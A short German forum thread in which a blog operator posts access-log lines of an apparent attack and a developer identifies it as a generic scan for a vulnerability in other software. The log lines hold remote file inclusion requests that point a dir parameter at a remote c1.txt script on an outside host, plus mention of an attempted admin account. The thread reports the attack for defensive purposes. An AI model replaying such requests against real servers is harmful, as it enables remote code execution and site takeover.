Sicherheitslücke?

[markus]

Moin,

ich habe in meinen Logs einen Hinweis auf einen gezielten SQL-Injection Angriff gefunden:

Code: Select all

- - - [13/Feb/2010:05:16:27 +0100] "GET //print_category.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 302 - "-" "Mozilla/5.0"
- - - [13/Feb/2010:05:16:27 +0100] "GET /plugin/tag/pdf%20%20//print_category.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 302 - "-" "Mozilla/5.0"
- - - [13/Feb/2010:05:16:27 +0100] "GET /plugin/tag//print_category.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 302 - "-" "Mozilla/5.0"
- - - [13/Feb/2010:05:16:27 +0100] "GET /plugin//print_category.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 302 - "-" "Mozilla/5.0"
- - - [13/Feb/2010:05:16:28 +0100] "GET //print_category.php?dir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 302 - "-" "Mozilla/5.0"

Danach wurde jeweils versucht, auf serendipity_admin.php zuzugreifen. Es wurde anscheinend versucht, einen User FeeL mit PW CoMz einzurichten. Ich würde mich freuen, wenn jemand, der das beurteilen kann, sich das mal näher anschaut.

Mein Versuch, die Betreiberin der genannten Domain zu kontaktieren, schlug fehl, weil die dort im Impressum angegebene E-Mail-Adresse anscheinend kaputt ist. Ich bekam jedenfalls Fehlermeldungen.

Gruß aus Kiel
Markus Hansen

[garvinhicking]

Hi!

Das ist ein Angriff auf eine andere Software: http://osvdb.org/12928

Also unabhängig von Serendipity - da guckt einfach jemand alle URLs ab und hofft irgendwo diese Software zu finden.

Grüße,
Garvin

[markus]

Danke für das schnelle Feedback. Ich hatte sowas in der Art vermutet, wollte im Zweifel aber lieber einmal zu oft Bescheid sagen.

Bis denn
Markus